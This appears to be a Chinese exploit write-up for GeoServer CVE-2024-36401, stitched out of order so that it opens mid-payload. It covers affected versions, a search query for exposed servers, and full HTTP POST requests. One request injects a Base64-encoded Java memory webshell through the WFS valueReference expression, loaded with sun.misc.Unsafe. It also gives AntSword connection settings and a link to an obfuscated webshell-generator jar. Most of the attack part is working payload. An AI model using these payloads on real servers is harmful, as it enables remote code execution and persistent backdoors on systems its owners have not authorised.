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";
var bt;
try {
    bt = java.lang.Class.forName("sun.misc.BASE64Decoder").newInstance().decodeBuffer(str);
} catch (e) {
    bt = java.util.Base64.getDecoder().decode(str);
}
var theUnsafe = java.lang.Class.forName("sun.misc.Unsafe").getDeclaredField("theUnsafe");
theUnsafe.setAccessible(true);
unsafe = theUnsafe.get(null);
unsafe.defineAnonymousClass(java.lang.Class.forName("java.lang.Class"), bt, null).newInstance();
')</wfs:valueReference>
</wfs:GetPropertyValue>

蚁剑：

密码: ant
请求路径: /*
请求头: User-Agent: Ictguw
脚本类型: JSP

原文: https://www.yuque.com/xiaokp7/ocvun2/fdfchodbcr91z97q

# GeoServer wfs存在属性名表达式前台代码执行漏洞（CVE-2024-36401）

# 一、漏洞简介
GeoServer 是基于 Java 的软件服务器，允许用户查看和编辑地理空间数据。使用开放地理空间联盟（OGC）提出的开放标准，GeoServer 在地图创建和数据共享方面具有极大的灵活性。前台存在任意命令执行漏洞，攻击者可以直接在web应用中执行系统命令，从而获取敏感信息或者拿下shell权限。

# 二、影响版本
+ GeoServer 2.25.1， 2.24.3， 2.23.5版本及以前

# 三、资产测绘
+ hunter`app.name="GeoServer"`
+ 特征

![1720148173327-ce2ad282-5cea-46e6-9e0e-c5a5d9d31c71.png](./img/I_3rARKIbHehVqWf/1720148173327-ce2ad282-5cea-46e6-9e0e-c5a5d9d31c71-004760.png)

# 四、漏洞复现
1. typeNames必须存在，我们可以在Web页面中找到当前服务器中的所有Types：

![1720148237774-86b3e952-7bd3-4722-81e0-1e746f4c01f8.png](./img/I_3rARKIbHehVqWf/1720148237774-86b3e952-7bd3-4722-81e0-1e746f4c01f8-586666.png)

2. poc

```http
POST /geoserver/wfs HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/xml
Content-Length: 356

![1720148282282-95b9fcbe-8416-4840-9d53-bd9d7bb08770.png](./img/I_3rARKIbHehVqWf/1720148282282-95b9fcbe-8416-4840-9d53-bd9d7bb08770-019834.png)

环境

```http
https://zenlayer.dl.sourceforge.net/project/geoserver/GeoServer/2.25.1/geoserver-2.25.1-bin.zip?viasf=1
```

[jMG-gui-obf-1.0.8.jar](https://www.yuque.com/attachments/yuque/0/2024/jar/29512878/1730214353910-1c9c949b-215a-49cf-a192-b3b899db8591.jar)

![1720272134763-677afa69-1e35-45d6-902d-8bdec2ba4b74.png](./img/I_3rARKIbHehVqWf/1720272134763-677afa69-1e35-45d6-902d-8bdec2ba4b74-700180.png)

打入内存马

```http
POST /geoserver/wfs HTTP/1.1
Host: 127.0.0.1:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/xml
Content-Length: 356

<wfs:GetPropertyValue service='WFS' version='2.0.0'
 xmlns:topp='http://www.openplans.org/topp'
 xmlns:fes='http://www.opengis.net/fes/2.0'
 xmlns:wfs='http://www.opengis.net/wfs/2.0'>
  <wfs:Query typeNames='sf:archsites'/>
  <wfs:valueReference>eval(getEngineByName(javax.script.ScriptEngineManager.new(),'js'),'
var str="yv66vgAAADEBvgEADWphdmEvbGFuZy9zdGMHAAEBABBqYXZhL2xhbmcvT2JqZWN0BwADAQANZ2V0VXJsUGF0dGVybgEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAEQ29kZQEAAi8qCAAIAQAMZ2V0Q2xhc3NOYW1lAQApb3JnLmFwYWNoZS5sb2dnaW5nLldoaXRlQmxhY2tMaXN0QWNGaWx0ZXIIAAsBAA9nZXRCYXNlNjRTdHJpbmcBAApFeGNlcHRpb25zAQATamF2YS9pby9JT0V4Y2VwdGlvbgcADwEAEGphdmEvbGFuZy9TdHJpbmcHABEBCTRINHNJQUFBQUFBQUFBSjFXYVhNYlZSWTlUMXZMY2dlQ1FoS1VrTURBRUN4dkloc1EyWVRZSmlRRzJRbHg0dUNZbWFFalBVbWR5R3FudStYRVpvZloyWmVaWVljWllESXNBVUlSaDBCQjVRUEZGQlFmS1NpcStETHpNNlpxZ1BPNmJWbnlSb3FTM2UvMXZmZmQ1ZHpsOVJmZmYvZ0pnUFU0S1pDMDdFTEtHRFd5UlprcVdZV0NXUzZrOWhkTlYzYVhqT3poak9tNFhka2J6WklyYlExQ1lPa2hZOHhJbFF4SzdUcDRTR1pkRFVHQkN4WDFXTXFSOWxoSnVxbHArYkJBcE5Nc20rNVdnV0JUY2xBZzFHUGxwTUQ1R2JNcyt5c2pCNlc5MXpoWUlpV2VzYkpHYWRDd1RmVStSUXk1UmRNUmFNbWNzNDhkT2pSRVl3amhQSUZvenZLcEFzTk5tWG9YQi94MWp6eFNrWTdic1JEWEdiWEtqcHpOOXJYMkZBMnozS0dpV2pZRHl2WmpXVG5xbWxaWlE1d0I1QXpYRUFnTWR3czBaa3VHNDJRc0k2Y2NTbmdxVTJWcTI3Y24welBENmlCbUk5SXRXam1CVlprWnhiYk1sd2gzcXMvalVTcE1mUk1UQWhmVUNIbDZ5QXRtUzQ3Q2RJWXo0TnBFalN4QlhKZG41bkdZdlBPY09sUUUxaTZPR2hQcDFDTWxjTWxQUUVrZzhqUHdDYXhlQkZzQnpaNTI1Y3BaY2tYWEhVM3Q1R09PVDFHNzZzenNyTTg5VlBYcTRzVWkxZEFzc0diUndEUzBNcXNMeHFLaFhlQ0tjd3BCdzFVQzY4N05jUTBiNm5yU1Q3T0dUUUpMQmx3MlI1OHhPdFZNc2FKVTlkVnZqRWdkMTJCTkF3SzRWcUNoSU4yZDBpL0tkVTF6S3lZNWw2UWpqWTVHam85T0p0UFhPbWlVS2xTNzFWZDdQWk9RdGNvdTQyWVpycTdWU2pEc0FSVm5PU3M3a2dkMGRLRTdoczNvWWJPTXNuaDFiUGQxM0NpZzA3WGRoazJIaWFLT25iN1JYdFpwenVvMkhIbjFwaHRrMXBzbksrWnpmTGhieDgzSXhLaXNUMkRsQXYybVlSY3QxVEkxM0ZLSDZkNml6UmcxREJEVGJNVzJaZG4xU1p4N1RiWHcrRlRDc3crRE1lekZmbllhUStnaEV2S1kyMVBYL25VSGE5dGZ4eEFPcU5QRG5NMU53M1Zqb21PQk04bEJOZlorRmNOdS9KbzI1eFhTY0R1emxaTjVUbDZQSE1WQjl1OHNXUTBNZERtSHlneTlsOTRYMVBrQ1U3UjNhUGQySFNaV042Q0lRNVJqZkV4Q3liQmxybTlxYW0yYkp4bkRjNFpVY3VIWnBxT0VrUmdrT0I0dVdraEt3eWp6NFVpTy9xeDBITk8vTUpvT0tDeHNPREVjZ2FzSXZUNDRZekU2ZkpTejFTeVBXWWNwdXFYV1MvOHFxL055aXBTY1M5SXhqZ21sL3c0Q1dwWkhlOHVPYTdDY1o1ZERWZnd1M0syaXVZZldXZm1HR3MzTDU3R3V1dUUrM0s4dXJ3ZXFLUDdjRzB0RnZSUy9hMFFLdjJmdlY2ZThNMzFibVZhcWQxZk5iZlVuVHZ0NVZkYklQTWlCblBOYXpxNi9YYVlpSU41amhyMlo5NC9qVW1LRlV5bTNqNWhPdHIyN2EyRDdkTGZhVVR4T1BYbkxHMFVjaWo4eGRQeHkwZkVrbmxJby9vWGQ2dnZRWGNubmxiYS8rVVBNTHdzZHovaTE4K3hVRDdkWFhMUFU3bytMS0o0bkZuN0orcDY4eUVtbFdsVFpJREp6dTVLR1g4YmZWVTcrd2ZUNWhxTjRsWkdxN3hwZWQ3UFRORFh6clhMZUxIZ2ZCM3EraHNKN1pqRjVEMTlpWjQwVFE2UHNSdkVtSGQ1SDJiYXVnbFR2SitoRmI5WXRWSTVHOFE1K3dka1dBa2tJOHNuSnlhODZvWWE3dDI3MTFqQjMvQ2JpczRGdlhUd2h1SzVzUG8zem0rTnZuY0tPNXZqYnA3Q2xPZjd1S1d3N1NWWUFNVDRqbmxnamY0RHVIK0c2eEZPOEZCZFFpdW9DUVNwV0V2OXRPWXYxNlZEcldXeE1oeE9oNXZleDVReXVDK0F6bktwNTQyYmJKRzU0Qmk5N3hCMW5jRk1BNlVnaThoa2ViRTVFSnRHZjFqN0M3cUhneDlqekFXNmR4RzJuOFp0ME5HN0VzNUdQSVllQzhmekFVT2c5SEI0WUNxdm5KS3gwUTZJaE5JbEtvaUVScFV4b0tKalFLUE1SaWtQQjB6aEdRYlZOYUorb2wwbmNlUll5SFV2RUpuRnYySmNPVVRvUkp1dTMrNDhqbk5hT283R3RwZlVNL2hERWNTeEpSNlpmVGpMaUxueUtmMk1aY2ZnSzMzQU5la2oxY3djc0oySXJ5TG1JSFpkQUoxWlIrbUwwTWdXM1lTMG1jQW51eGFVNHdaUjlpc3VwNVRKOGppdndKZFpSVnpPMU5lRmJKUEVmdEhoNFRsQlRMKzdBaGRTclVVT1J1bGNTNnduY1JBc0pZbitDNzZ1d21oNTA0bUZhV2tQNzMxSmlMUzFGVkVhbXNxVjJsOUtxOEhhWDBYYkEyLzJTMW9PVS9JNGVYTWtpMHZFMWZVaXlYSzRtdndXUkgraWtwaUdnb1VWRG00YVVodlVhTm1xOHJJV0daZitEQ0dqZDNEVGdqMTY1QlBCblBFUXp2SEw5NHNEL1NRMXpIWTgvOFFIKzJ0Y2FmenJrWjNFejRYNnVsVGtJZVRsbzhST1RyLzY5MnhkL2dTZjYyK0l2c1JRa2hRVlhwdm5PZENqQjVaWDRhN1dhRXFHRjlIaFJYOFdQaHVsY3JmS3dTZkdwcU91eGdiOXJzWkV1Yi9KdzMwcE9oTkVyWlBsNXhCeXFYWkQ4TnFMOENISGFnQjE0bEJnckZNZXJHSS9qTVdaQWVOaXhjNDRRRnc4VzFaekwrUDlQRnBNUHltYXZ3OWhGczF0dGkrZkFDcDlaVlN6d0w3ek81N1F5aGZBYjFXNXU4U1RtVWRaWjA3ZFZaVDhDKzFySG9mY05BQUE9CAATAQAGPGluaXQ+AQAVKExqYXZhL2xhbmcvU3RyaW5nOylWDAAVABYKABIAFwEAAygpVgEAE2phdmEvbGFuZy9FeGNlcHRpb24HABoBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAZmaWx0ZXIBABJMamF2YS9sYW5nL09iamVjdDsBAAdjb250ZXh0AQAIY29udGV4dHMBABBMamF2YS91dGlsL0xpc3Q7AQAEdGhpcwEAD0xqYXZhL2xhbmcvc3RjOwEAFkxvY2FsVmFyaWFibGVUeXBlVGFibGUBACRMamF2YS91dGlsL0xpc3Q8TGphdmEvbGFuZy9PYmplY3Q7PjsBAA5qYXZhL3V0aWwvTGlzdAcAJwEAEmphdmEvdXRpbC9JdGVyYXRvcgcAKQEADVN0YWNrTWFwVGFibGUMABUAGQoABAAsAQAKZ2V0Q29udGV4dAEAEigpTGphdmEvdXRpbC9MaXN0OwwALgAvCgACADABAAhpdGVyYXRvcgEAFigpTGphdmEvdXRpbC9JdGVyYXRvcjsMADIAMwsAKAA0AQAHaGFzTmV4dAEAAygpWgwANgA3CwAqADgBAARuZXh0AQAUKClMamF2YS9sYW5nL09iamVjdDsMADoAOwsAKgA8AQAJZ2V0RmlsdGVyAQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsMAD4APwoAAgBAAQAJYWRkRmlsdGVyAQAnKExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvT2JqZWN0OylWDABCAEMKAAIARAEADWdldEZpbHRlck5hbWUBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEADGxhc3REb3RJbmRleAEAAUkBAAljbGFzc05hbWUBABJMamF2YS9sYW5nL1N0cmluZzsBAAEuCABMAQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoMAE4ATwoAEgBQAQALbGFzdEluZGV4T2YBABUoTGphdmEvbGFuZy9TdHJpbmc7KUkMAFIAUwoAEgBUAQAJc3Vic3RyaW5nAQAVKEkpTGphdmEvbGFuZy9TdHJpbmc7DABWAFcKABIAWAEAC19maWx0ZXJOYW1lAQABaQEAAWoBAA5zZXJ2bGV0SGFuZGxlcgEAEWZpbHRlckhvbGRlckNsYXNzAQARTGphdmEvbGFuZy9DbGFzczsBAAtjb25zdHJ1Y3RvcgEAH0xqYXZhL2xhbmcvcmVmbGVjdC9Db25zdHJ1Y3RvcjsBAAxmaWx0ZXJIb2xkZXIBAApmaWx0ZXJNYXBzAQANdG1wRmlsdGVyTWFwcwEAE1tMamF2YS9sYW5nL09iamVjdDsBAAFuAQALbWFnaWNGaWx0ZXIBAApmaWx0ZXJOYW1lAQALZmlsdGVyQ2xhc3MBAA9qYXZhL2xhbmcvQ2xhc3MHAGoBAB1qYXZhL2xhbmcvcmVmbGVjdC9Db25zdHJ1Y3RvcgcAbAcAZQwACgAGCgACAG8MAEYARwoAAgBxAQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7DABzAHQKAAQAdQEAD19zZXJ2bGV0SGFuZGxlcggAdwEABWdldEZWAQA4KExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL09iamVjdDsMAHkAegoAAgB7AQAHZ2V0TmFtZQwAfQAGCgBrAH4BAAppc0luamVjdGVkAQAnKExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvU3RyaW5nOylaDACAAIEKAAIAggEADmdldENsYXNzTG9hZGVyAQAZKClMamF2YS9sYW5nL0NsYXNzTG9hZGVyOwwAhACFCgBrAIYBACZvcmcuZWNsaXBzZS5qZXR0eS5zZXJ2bGV0LkZpbHRlckhvbGRlcggAiAEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgcAigEACWxvYWRDbGFzcwEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsMAIwAjQoAiwCOAQAOZ2V0Q29uc3RydWN0b3IBADMoW0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9Db25zdHJ1Y3RvcjsMAJAAkQoAawCSAQALbmV3SW5zdGFuY2UBACcoW0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsMAJQAlQoAbQCWAQAHc2V0TmFtZQgAmAEADGludm9rZU1ldGhvZAEAXShMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzcztbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwwAmgCbCgACAJwBABRhZGRGaWx0ZXJXaXRoTWFwcGluZwgAngEAEWphdmEvbGFuZy9JbnRlZ2VyBwCgAQAEVFlQRQwAogBfCQChAKMMAAUABgoAAgClAQAHdmFsdWVPZgEAFihJKUxqYXZhL2xhbmcvSW50ZWdlcjsMAKcAqAoAoQCpAQAPX2ZpbHRlck1hcHBpbmdzCACrAQAXamF2YS9sYW5nL3JlZmxlY3QvQXJyYXkHAK0BAAlnZXRMZW5ndGgBABUoTGphdmEvbGFuZy9PYmplY3Q7KUkMAK8AsAoArgCxAQADZ2V0AQAnKExqYXZhL2xhbmcvT2JqZWN0O0kpTGphdmEvbGFuZy9PYmplY3Q7DACzALQKAK4AtQgAWgEAA3NldAEAKChMamF2YS9sYW5nL09iamVjdDtJTGphdmEvbGFuZy9PYmplY3Q7KVYMALgAuQoArgC6AQAVaW52YWxpZGF0ZUNoYWluc0NhY2hlCAC8DACaAHoKAAIAvgEAIGphdmEvbGFuZy9DbGFzc05vdEZvdW5kRXhjZXB0aW9uBwDAAQAramF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvblRhcmdldEV4Y2VwdGlvbgcAwgEAH2phdmEvbGFuZy9Ob1N1Y2hNZXRob2RFeGNlcHRpb24HAMQBACBqYXZhL2xhbmcvSWxsZWdhbEFjY2Vzc0V4Y2VwdGlvbgcAxgEAJGphdmEvaW8vVW5zdXBwb3J0ZWRFbmNvZGluZ0V4Y2VwdGlvbgcAyAEAEmNvbnRleHRDbGFzc0xvYWRlcgEABnRocmVhZAEAEkxqYXZhL2xhbmcvVGhyZWFkOwEAB3RocmVhZHMBABNbTGphdmEvbGFuZy9UaHJlYWQ7BwDOAQAQamF2YS9sYW5nL1RocmVhZAcA0AEAE2phdmEvdXRpbC9BcnJheUxpc3QHANIKANMALAEAEWdldEFsbFN0YWNrVHJhY2VzAQARKClMamF2YS91dGlsL01hcDsMANUA1goA0QDXAQANamF2YS91dGlsL01hcAcA2QEABmtleVNldAEAESgpTGphdmEvdXRpbC9TZXQ7DADbANwLANoA3QEADWphdmEvdXRpbC9TZXQHAN8BAAd0b0FycmF5AQAoKFtMamF2YS9sYW5nL09iamVjdDspW0xqYXZhL2xhbmcvT2JqZWN0OwwA4QDiCwDgAOMBABVnZXRDb250ZXh0Q2xhc3NMb2FkZXIBACYoTGphdmEvbGFuZy9UaHJlYWQ7KUxqYXZhL2xhbmcvT2JqZWN0OwwA5QDmCgACAOcBABNpc1dlYkFwcENsYXNzTG9hZGVyAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaDADpAOoKAAIA6wEAH2dldENvbnRleHRGcm9tV2ViQXBwQ2xhc3NMb2FkZXIMAO0APwoAAgDuAQADYWRkDADwAOoLACgA8QEAEGlzSHR0cENvbm5lY3Rpb24BABUoTGphdmEvbGFuZy9UaHJlYWQ7KVoMAPMA9AoAAgD1AQAcZ2V0Q29udGV4dEZyb21IdHRwQ29ubmVjdGlvbgwA9wDmCgACAPgBAAlTaWduYXR1cmUBACYoKUxqYXZhL3V0aWwvTGlzdDxMamF2YS9sYW5nL09iamVjdDs+OwgA5QEAC2NsYXNzTG9hZGVyAQARV2ViQXBwQ2xhc3NMb2FkZXIIAP4BAAdoYW5kbGVyAQAIX2NvbnRleHQIAQEBAA9fY29udGV4dEhhbmRsZXIIAQMBAA5odHRwQ29ubmVjdGlvbgEABWVudHJ5AQAMdGhyZWFkTG9jYWxzAQAFdGFibGUIAQcIAQgBAAV2YWx1ZQgBCwEADkh0dHBDb25uZWN0aW9uCAENAQALaHR0cENoYW5uZWwBAAdyZXF1ZXN0AQAHc2Vzc2lvbgEADnNlcnZsZXRDb250ZXh0AQAOZ2V0SHR0cENoYW5uZWwIARMBAApnZXRSZXF1ZXN0CAEVAQAKZ2V0U2Vzc2lvbggBFwEAEWdldFNlcnZsZXRDb250ZXh0CAEZAQAGdGhpcyQwCAEbAQAYSHR0cENvbm5lY3Rpb24gbm90IGZvdW5kCAEdCgAbABcBAAljbGF6ekJ5dGUBAAJbQgEAC2RlZmluZUNsYXNzAQAaTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAAVjbGF6egEAAmUxAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQABZQEAF0xqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7DAEpASoKANEBKwwA5QCFCgDRAS0MAJQAOwoAawEvDAANAAYKAAIBMQEADGRlY29kZUJhc2U2NAEAFihMamF2YS9sYW5nL1N0cmluZzspW0IMATMBNAoAAgE1AQAOZ3ppcERlY29tcHJlc3MBAAYoW0IpW0IMATcBOAoAAgE5CAEiBwEhAQARZ2V0RGVjbGFyZWRNZXRob2QBAEAoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7DAE9AT4KAGsBPwEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAcBQQEADXNldEFjY2Vzc2libGUBAAQoWilWDAFDAUQKAUIBRQEABmludm9rZQEAOShMamF2YS9sYW5nL09iamVjdDtbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwwBRwFICgFCAUkBAA9wcmludFN0YWNrVHJhY2UMAUsAGQoAGwFMAQAPZmlsdGVyQ2xhc3NOYW1lAQAMZGVjb2RlckNsYXNzAQAHZGVjb2RlcgEAB2lnbm9yZWQBAAliYXNlNjRTdHIBABRMamF2YS9sYW5nL0NsYXNzPCo+OwEAFnN1bi5taXNjLkJBU0U2NERlY29kZXIIAVQBAAdmb3JOYW1lDAFWAI0KAGsBVwEADGRlY29kZUJ1ZmZlcggBWQEACWdldE1ldGhvZAwBWwE+CgBrAVwBABBqYXZhLnV0aWwuQmFzZTY0CAFeAQAKZ2V0RGVjb2RlcggBYAEABmRlY29kZQgBYgEADmNvbXByZXNzZWREYXRhAQADb3V0AQAfTGphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtOwEAAmluAQAeTGphdmEvaW8vQnl0ZUFycmF5SW5wdXRTdHJlYW07AQAGdW5nemlwAQAfTGphdmEvdXRpbC96aXAvR1pJUElucHV0U3RyZWFtOwEABmJ1ZmZlcgEAHWphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtBwFsAQAcamF2YS9pby9CeXRlQXJyYXlJbnB1dFN0cmVhbQcBbgEAHWphdmEvdXRpbC96aXAvR1pJUElucHV0U3RyZWFtBwFwCgFtACwBAAUoW0IpVgwAFQFzCgFvAXQBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYMABUBdgoBcQF3AQAEcmVhZAEABShbQilJDAF5AXoKAXEBewEABXdyaXRlAQAHKFtCSUkpVgwBfQF+CgFtAX8BAAt0b0J5dGVBcnJheQEABCgpW0IMAYEBggoBbQGDAQADb2JqAQAJZmllbGROYW1lAQAFZmllbGQBABlMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAEZ2V0RgEAPyhMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwwBiQGKCgACAYsBABdqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZAcBjQoBjgFFDACzAD8KAY4BkAEAHmphdmEvbGFuZy9Ob1N1Y2hGaWVsZEV4Y2VwdGlvbgcBkgEAIExqYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb247AQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwwBlQGWCgBrAZcBAA1nZXRTdXBlcmNsYXNzDAGZAHQKAGsBmgoBkwAXAQAMdGFyZ2V0T2JqZWN0AQAKbWV0aG9kTmFtZQEAB21ldGhvZHMBABtbTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBACFMamF2YS9sYW5nL05vU3VjaE1ldGhvZEV4Y2VwdGlvbjsBACJMamF2YS9sYW5nL0lsbGVnYWxBY2Nlc3NFeGNlcHRpb247AQAKcGFyYW1DbGF6egEAEltMamF2YS9sYW5nL0NsYXNzOwEABXBhcmFtAQAGbWV0aG9kAQAJdGVtcENsYXNzBwGgAQASZ2V0RGVjbGFyZWRNZXRob2RzAQAdKClbTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsMAakBqgoAawGrCgFCAH4BAAZlcXVhbHMMAa4A6goAEgGvAQARZ2V0UGFyYW1ldGVyVHlwZXMBABQoKVtMamF2YS9sYW5nL0NsYXNzOwwBsQGyCgFCAbMKAMUAFwEAGmphdmEvbGFuZy9SdW50aW1lRXhjZXB0aW9uBwG2AQAKZ2V0TWVzc2FnZQwBuAAGCgDHAbkKAbcAFwEACDxjbGluaXQ+CgACACwAIQACAAQAAAAAABUAAQAFAAYAAQAHAAAADwABAAEAAAADEgmwAAAAAAABAAoABgABAAcAAAAQAAEAAQAAAAQTAAywAAAAAAABAA0ABgACAA4AAAAEAAEAEAAHAAAAFwADAAEAAAALuwASWRMAFLcAGLAAAAAAAAEAFQAZAAEABwAAANgAAwAFAAAANiq3AC0qtgAxTCu5ADUBAE0suQA5AQCZABssuQA9AQBOKi23AEE6BCotGQS2AEWn/+KnAARMsQABAAQAMQA0ABsABAAcAAAAJgAJAAAAIwAEACUACQAmACAAJwAnACgALgApADEALAA0ACoANQAuAB0AAAAqAAQAJwAHAB4AHwAEACAADgAgAB8AAwAJACgAIQAiAAEAAAA2ACMAJAAAACUAAAAMAAEACQAoACEAJgABACsAAAAaAAT/ABAAAwcAAgcAKAcAKgAA+QAgQgcAGwAAAQBGAEcAAQAHAAAAbQADAAMAAAAaKxJNtgBRmQASKxJNtgBVPSscBGC2AFmwK7AAAAADABwAAAASAAQAAAAxAAkAMgAQADMAGAA1AB0AAAAgAAMAEAAIAEgASQACAAAAGgAjACQAAAAAABoASgBLAAEAKwAAAA